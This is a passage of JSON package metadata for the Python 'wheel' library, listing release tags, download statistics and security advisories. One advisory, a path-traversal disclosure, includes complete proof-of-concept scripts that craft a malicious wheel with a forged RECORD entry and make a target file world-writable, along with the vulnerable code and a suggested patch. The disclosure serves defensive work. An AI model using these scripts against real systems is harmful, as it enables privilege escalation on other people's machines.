_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.2/manifests"},{"name":"0.32.1","sha":"e284ddf676adffa22f6d6a7b02be7328acfe23c4","kind":"commit","published_at":"2018-10-04T06:42:04.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.32.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.1/manifests"},{"name":"0.32.0","sha":"46e55b9bc7ac63d4c3a4dee706515968d58848ac","kind":"commit","published_at":"2018-09-29T15:36:41.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.32.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.0/manifests"},{"name":"0.31.1","sha":"3dc261abc98a5e43bc7fcf5783d080aaf8f9f0cf","kind":"commit","published_at":"2018-05-13T17:22:12.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.31.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.31.1/manifests"},{"name":"0.31.0","sha":"13d6ff3e8ef509b469d6bb6dd9cd8870ac3f2a16","kind":"commit","published_at":"2018-04-01T20:34:19.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.31.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.31.0/manifests"},{"name":"0.30.0","sha":"3c9cc212a76b334307985cebfa7ebf269a419223","kind":"commit","published_at":"2017-09-10T21:53:40.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.30.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.30.0/manifests"},{"name":"0.29.0","sha":"bc574d6ed73dabee02e4e00764172d6284a37cb4","kind":"commit","published_at":"2016-02-06T17:18:19.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.29.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.29.0/manifests"},{"name":"0.28.0","sha":"36997ae4545f3c876771a53f11ae4aa9127cabfe","kind":"commit","published_at":"2016-02-05T21:35:05.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.28.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.28.0/manifests"},{"name":"0.27.0","sha":"379fe05f71fc6144d5f58e582b6580339479e238","kind":"commit","published_at":"2016-02-05T16:38:24.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.27.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.27.0/manifests"},{"name":"0.26.0","sha":"acb3cf8177034c014cfe90a691a850b5322951b5","kind":"commit","published_at":"2015-09-18T18:04:37.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.26.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.26.0/manifests"},{"name":"0.25.0","sha":"4b9fd6bf095c1b4427ed65ac19e4d5666a719f33","kind":"commit","published_at":"2015-09-17T00:34:49.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.25.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.25.0/manifests"},{"name":"0.24.0","sha":"cd0935c4fe92a15ea83057a9357347ae8d6a138e","kind":"commit","published_at":"2014-07-06T16:56:09.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.24.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.24.0/manifests"},{"name":"0.23.0","sha":"75c59f175c8cb2bfcb6660927232b40df1e149c4","kind":"commit","published_at":"2014-04-01T02:01:41.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.23.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.23.0/manifests"},{"name":"0.22.0","sha":"f1cc0b8a8601040b864e1e784e160744c7e3d965","kind":"commit","published_at":"2013-09-15T20:45:04.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.22.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.22.0/manifests"},{"name":"0.21.0","sha":"474826f4d64064e852b541f099fa69dcf5dd20fa","kind":"commit","published_at":"2013-07-20T16:19:52.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.21.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.21.0/manifests"},{"name":"0.16.0","sha":"f65ab72e2c6b04d10a4153807f473c9e9af421d5","kind":"commit","published_at":"2013-04-30T01:46:52.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.16.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.16.0/manifests"},{"name":"0.15.0","sha":"dffddb1d5af9e736fdd6192ca9256dc767bfab51","kind":"commit","published_at":"2012-11-16T14:06:00.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.15.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.15.0/manifests"},{"name":"0.13.0","sha":"60fa189589155e43f33587f67eb44bb4fd7d5b58","kind":"commit","published_at":"2012-10-18T00:16:05.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.13.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.13.0/manifests"},{"name":"0.12.0","sha":"2861596953a6ddfb2c4f052a46a2e2b4c5619245","kind":"commit","published_at":"2012-10-06T12:34:19.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.12.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.12.0/manifests"},{"name":"0.11.0","sha":"8dd29d841e15596bc9b5d1c7f7576b2a66113f92","kind":"commit","published_at":"2012-10-06T12:18:46.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.11.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.11.0/manifests"},{"name":"0.10.3","sha":"7021b0ee2a51e5d9447d06038db58e9e597625f7","kind":"commit","published_at":"2012-10-03T22:55:11.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.10.3","html_url":"https://github.com/pypa/wheel/releases/tag/0.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.3/manifests"},{"name":"0.10.2","sha":"126aaacc9f24fa69b6b74d4e742f645f6bb65cf3","kind":"commit","published_at":"2012-10-03T01:11:35.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.10.2","html_url":"https://github.com/pypa/wheel/releases/tag/0.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.2/manifests"},{"name":"0.10.1","sha":"92e52e6745ec6b1178c2f42585c2f37ab04902a8","kind":"commit","published_at":"2012-10-01T02:52:13.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.10.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.1/manifests"},{"name":"0.10.0","sha":"9ee6da6d6cab3fa171f2704df5f934474acc4aae","kind":"commit","published_at":"2012-10-01T02:20:04.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.10.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.0/manifests"},{"name":"0.9.7","sha":"a118f5845570ebaf6566b8075dc1dcaf117d7d43","kind":"commit","published_at":"2012-09-20T15:52:36.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.9.7","html_url":"https://github.com/pypa/wheel/releases/tag/0.9.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.7/manifests"},{"name":"0.9.6","sha":"0c4752551e4fa1d4e9786fc874ae97edf52c0369","kind":"commit","published_at":"2012-09-20T01:46:26.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.9.6","html_url":"https://github.com/pypa/wheel/releases/tag/0.9.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.6/manifests"},{"name":"0.9.4","sha":"8db2d0d4760a0886998e3fca4206f5db3230d223","kind":"commit","published_at":"2012-09-11T12:32:56.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.9.4","html_url":"https://github.com/pypa/wheel/releases/tag/0.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.4/manifests"},{"name":"0.9.3","sha":"ca65be72feaf5ebe92ef4c9e91bd722360c1ad2c","kind":"commit","published_at":"2012-09-11T02:38:10.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.9.3","html_url":"https://github.com/pypa/wheel/releases/tag/0.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.3/manifests"},{"name":"0.9.1","sha":"6952bc635deb0afdf36c5f325aa166636f1c2a52","kind":"commit","published_at":"2012-08-28T23:07:55.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.9.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.1/manifests"},{"name":"0.9","sha":"49b1d5dac1cdeaf98998b1e5bdb0e2cf134edff3","kind":"commit","published_at":"2012-08-23T03:08:13.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.9","html_url":"https://github.com/pypa/wheel/releases/tag/0.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9/manifests"},{"name":"0.7","sha":"b2930f5f5d3c898389bdbdd7c854a0b9d320cf14","kind":"commit","published_at":"2012-07-28T12:12:45.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.7","html_url":"https://github.com/pypa/wheel/releases/tag/0.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.7/manifests"},{"name":"0.6","sha":"bdf9d5747a724664bd3588ab471907a900b45c9a","kind":"commit","published_at":"2012-07-23T16:26:11.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.6","html_url":"https://github.com/pypa/wheel/releases/tag/0.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.6/manifests"},{"name":"0.5","sha":"d02f91dceda7c4a16cc26ea80f0eecfff638e4b2","kind":"commit","published_at":"2012-07-17T16:23:12.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.5","html_url":"https://github.com/pypa/wheel/releases/tag/0.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.5/manifests"}]},"repo_metadata_updated_at":"2024-09-08T05:17:11.779Z","dependent_packages_count":4197,"downloads":513255222,"downloads_period":"last-month","dependent_repos_count":76418,"rankings":{"downloads":0.0011004994433306983,"dependent_repos_count":0.016874324797737372,"dependent_packages_count":0.00623616351220729,"stargazers_count":3.797273329212574,"forks_count":5.242412514879669,"docker_downloads_count":0.0009170828694422486,"average":1.5108023191191602},"purl":"pkg:pypi/wheel","advisories":[{"uuid":"GSA_kwCzR0hTQS04cnJoLXJ3OGotdzVmeM4ABRYR","url":"https://github.com/advisories/GHSA-8rrh-rw8j-w5fx","title":"Wheel Affected by Arbitrary File Permission Modification via Path Traversal in wheel unpack","description":"### Summary\n - **Vulnerability Type:** Path Traversal (CWE-22) leading to Arbitrary File Permission Modification.  \n - **Root Cause Component:** wheel.cli.unpack.unpack function.  \n - **Affected Packages:**  \n   1. wheel (Upstream source)  \n   2. setuptools (Downstream, vendors wheel)  \n - **Severity:** High (Allows modifying system file permissions).  \n\n### Details  \nThe vulnerability exists in how the unpack function handles file permissions after extraction. The code blindly trusts the filename from the archive header for the chmod operation, even though the extraction process itself might have sanitized the path.  \n```\n# Vulnerable Code Snippet (present in both wheel and setuptools/_vendor/wheel)\nfor zinfo in wf.filelist:\n    wf.extract(zinfo, destination)  # (1) Extraction is handled safely by zipfile\n\n    # (2) VULNERABILITY:\n    # The 'permissions' are applied to a path constructed using the UNSANITIZED 'zinfo.filename'.\n    # If zinfo.filename contains \"../\", this targets files outside the destination.\n    permissions = zinfo.external_attr \u003e\u003e 16 \u0026 0o777\n    destination.joinpath(zinfo.filename).chmod(permissions)\n```  \n\n### PoC  \nI have confirmed this exploit works against the unpack function imported from setuptools._vendor.wheel.cli.unpack.  \n\n**Prerequisites:** pip install setuptools  \n\n**Step 1: Generate the Malicious Wheel (gen_poc.py)**  \nThis script creates a wheel that passes internal hash validation but contains a directory traversal payload in the file list.  \n```\nimport zipfile\nimport hashlib\nimport base64\nimport os\n\ndef urlsafe_b64encode(data):\n    \"\"\"\n    Helper function to encode data using URL-safe Base64 without padding.\n    Required by the Wheel file format specification.\n    \"\"\"\n    return base64.urlsafe_b64encode(data).rstrip(b'=').decode('ascii')\n\ndef get_hash_and_size(data_bytes):\n    \"\"\"\n    Calculates SHA-256 hash and size of the data.\n    These values are required to construct a valid 'RECORD' file,\n    which is used by the 'wheel' library to verify integrity.\n    \"\"\"\n    digest = hashlib.sha256(data_bytes).digest()\n    hash_str = \"sha256=\" + urlsafe_b64encode(digest)\n    return hash_str, str(len(data_bytes))\n\ndef create_evil_wheel_v4(filename=\"evil-1.0-py3-none-any.whl\"):\n    print(f\"[Generator V4] Creating 'Authenticated' Malicious Wheel: {filename}\")\n\n    # 1. Prepare Standard Metadata Content\n    # These are minimal required contents to make the wheel look legitimate.\n    wheel_content = b\"Wheel-Version: 1.0\\nGenerator: bdist_wheel (0.37.1)\\nRoot-Is-Purelib: true\\nTag: py3-none-any\\n\"\n    metadata_content = b\"Metadata-Version: 2.1\\nName: evil\\nVersion: 1.0\\nSummary: PoC Package\\n\"\n   \n    # 2. Define Malicious Payload (Path Traversal)\n    # The content doesn't matter, but the path does.\n    payload_content = b\"PWNED by Path Traversal\"\n\n    # [ATTACK VECTOR]: Target a file OUTSIDE the extraction directory using '../'\n    # The vulnerability allows 'chmod' to affect this path directly.\n    malicious_path = \"../../poc_target.txt\"\n\n    # 3. Calculate Hashes for Integrity Check Bypass\n    # The 'wheel' library verifies if the file hash matches the RECORD entry.\n    # To bypass this check, we calculate the correct hash for our malicious file.\n    wheel_hash, wheel_size = get_hash_and_size(wheel_content)\n    metadata_hash, metadata_size = get_hash_and_size(metadata_content)\n    payload_hash, payload_size = get_hash_and_size(payload_content)\n\n    # 4. Construct the 'RECORD' File\n    # The RECORD file lists all files in the wheel with their hashes.\n    # CRITICAL: We explicitly register the malicious path ('../../poc_target.txt') here.\n    # This tricks the 'wheel' library into treating the malicious file as a valid, verified component.\n    record_lines = [\n        f\"evil-1.0.dist-info/WHEEL,{wheel_hash},{wheel_size}\",\n        f\"evil-1.0.dist-info/METADATA,{metadata_hash},{metadata_size}\",\n        f\"{malicious_path},{payload_hash},{payload_size}\",  # \u003c-- Authenticating the malicious path\n        \"evil-1.0.dist-info/RECORD,,\"\n    ]\n    record_content = \"\\n\".join(record_lines).encode('utf-8')\n\n    # 5. Build the Zip File\n    with zipfile.ZipFile(filename, \"w\") as zf:\n        # Write standard metadata files\n        zf.writestr(\"evil-1.0.dist-info/WHEEL\", wheel_content)\n        zf.writestr(\"evil-1.0.dist-info/METADATA\", metadata_content)\n        zf.writestr(\"evil-1.0.dist-info/RECORD\", record_content)\n\n        # [EXPLOIT CORE]: Manually craft ZipInfo for the malicious file\n        # We need to set specific permission bits to trigger the vulnerability.\n        zinfo = zipfile.ZipInfo(malicious_path)\n       \n        # Set external attributes to 0o777 (rwxrwxrwx)\n        # Upper 16 bits: File type (0o100000 = Regular File)\n        # Lower 16 bits: Permissions (0o777 = World Writable)\n        # The vulnerable 'unpack' function will blindly apply this '777' to the system file.\n        zinfo.external_attr = (0o100000 | 0o777) \u003c\u003c 16\n       \n        zf.writestr(zinfo, payload_content)\n\n    print(\"[Generator V4] Done. Malicious file added to RECORD and validation checks should pass.\")\n\nif __name__ == \"__main__\":\n    create_evil_wheel_v4()\n```  \n\n**Step 2: Run the Exploit (exploit.py)**  \n```\nfrom pathlib import Path\nimport sys\n\n# Demonstrating impact on setuptools\ntry:\n    from setuptools._vendor.wheel.cli.unpack import unpack\n    print(\"[*] Loaded unpack from setuptools\")\nexcept ImportError:\n    from wheel.cli.unpack import unpack\n    print(\"[*] Loaded unpack from wheel\")\n\n# 1. Setup Target (Read-Only system file simulation)\ntarget = Path(\"poc_target.txt\")\ntarget.write_text(\"SENSITIVE CONFIG\")\ntarget.chmod(0o400) # Read-only\nprint(f\"[*] Initial Perms: {oct(target.stat().st_mode)[-3:]}\")\n\n# 2. Run Vulnerable Unpack\n# The wheel contains \"../../poc_target.txt\".\n# unpack() will extract safely, BUT chmod() will hit the actual target file.\ntry:\n    unpack(\"evil-1.0-py3-none-any.whl\", \"unpack_dest\")\nexcept Exception as e:\n    print(f\"[!] Ignored expected extraction error: {e}\")\n\n# 3. Check Result\nfinal_perms = oct(target.stat().st_mode)[-3:]\nprint(f\"[*] Final Perms: {final_perms}\")\n\nif final_perms == \"777\":\n    print(\"VULNERABILITY CONFIRMED: Target file is now world-writable (777)!\")\nelse:\n    print(\"[-] Attack failed.\")\n```  \n\n**result:**  \n\u003cimg width=\"806\" height=\"838\" alt=\"image\" src=\"https://github.com/user-attachments/assets/f750eb3b-36ea-445c-b7f4-15c14eb188db\" /\u003e  \n  \n### Impact  \nAttackers can craft a malicious wheel file that, when unpacked, changes the permissions of critical system files (e.g., /etc/passwd, SSH keys, config files) to 777. This allows for Privilege Escalation or arbitrary code execution by modifying now-writable scripts.  \n\n### Recommended Fix  \nThe unpack function must not use zinfo.filename for post-extraction operations. It should use the sanitized path returned by wf.extract().  \n\n### Suggested Patch:  \n```\n# extract() returns the actual path where the file was written\nextracted_path = wf.extract(zinfo, destination)\n\n# Only apply chmod if a file was actually written\nif extracted_path:\n    permissions = zinfo.external_attr \u003e\u003e 16 \u0026 0o777\n    Path(extracted_path).chmod(permissions)\n```","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2026-01-22T18:02:56.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":7.1,"cvss_vector":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H","references":["https://github.com/pypa/wheel/security/advisories/GHSA-8rrh-rw8j-w5fx","https://nvd.nist.gov/vuln/detail/CVE-2026-24049","https://github.com/pypa/wheel/commit/7a7d2de96b22a9adf9208afcc9547e1001569fef","https://github.com/pypa/wheel/releases/tag/0.46.2","https://github.com/pypa/wheel/commit/934fe177ff912c8e03d5ae951d3805e1fd90ba5e","https://github.com/advisories/GHSA-8rrh-rw8j-w5fx"],"source_kind":"github","identifiers":["GHSA-8rrh-rw8j-w5fx","CVE-2026-24049"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-01-22T19:00:08.235Z","updated_at":"2026-06-20T21:02:39.088Z","epss_percentage":0.00278,"epss_percentile":0.19347,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS04cnJoLXJ3OGotdzVmeM4ABRYR","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS04cnJoLXJ3OGotdzVmeM4ABRYR","packages":[{"ecosystem":"pypi","package_name":"wheel","versions":[{"first_patched_version":"0.46.2","vulnerable_version_range":"\u003e= 0.40.0, \u003c= 0.46.1"}],"purl":"pkg:pypi/wheel"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS04cnJoLXJ3OGotdzVmeM4ABRYR/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1xd21wLTJjZjItZzlnNs4AAwjr","url":"https://github.com/advisories/GHSA-qwmp-2cf2-g9g6","title":"pypa/wheel vulnerable to Regular Expression denial of service (ReDoS)","description":"Python Packaging Authority (PyPA) Wheel is a reference implementation of the Python wheel packaging standard. Wheel 0.37.1 and earlier are vulnerable to a Regular Expression denial of service via attacker controlled input to the wheel cli. The vulnerable regex is used to verify the validity of Wheel file names. This has been patched in version 0.38.1.","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2022-12-23T00:30:23.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":7.5,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","references":["https://nvd.nist.gov/vuln/detail/CVE-2022-40898","https://github.com/pypa/wheel/blob/main/src/wheel/wheelfile.py#L18","https://github.com/pypa/advisory-database/tree/main/vulns/wheel/PYSEC-2022-43017.yaml","https://pypi.org/project/wheel","https://pyup.io/posts/pyup-discovers-redos-vulnerabilities-in-top-python-packages","https://pyup.io/vulnerabilities/CVE-2022-40898/51499","https://github.com/advisories/GHSA-qwmp-2cf2-g9g6"],"source_kind":"github","identifiers":["GHSA-qwmp-2cf2-g9g6","CVE-2022-40898"],"repository_url":"https://github.com/pypa/wheel","blast_radius":0.0,"created_at":"2022-12-26T20:24:16.932Z","updated_at":"2026-06-20T04:04:31.570Z","epss_percentage":0.02659,"epss_percentile":0.83717,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1xd21wLTJjZjItZzlnNs4AAwjr","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1xd21wLTJjZjItZzlnNs4AAwjr","packages":[{"ecosystem":"pypi","package_name":"wheel","versions":[{"first_patched_version":"0.38.1","vulnerable_version_range":"\u003c 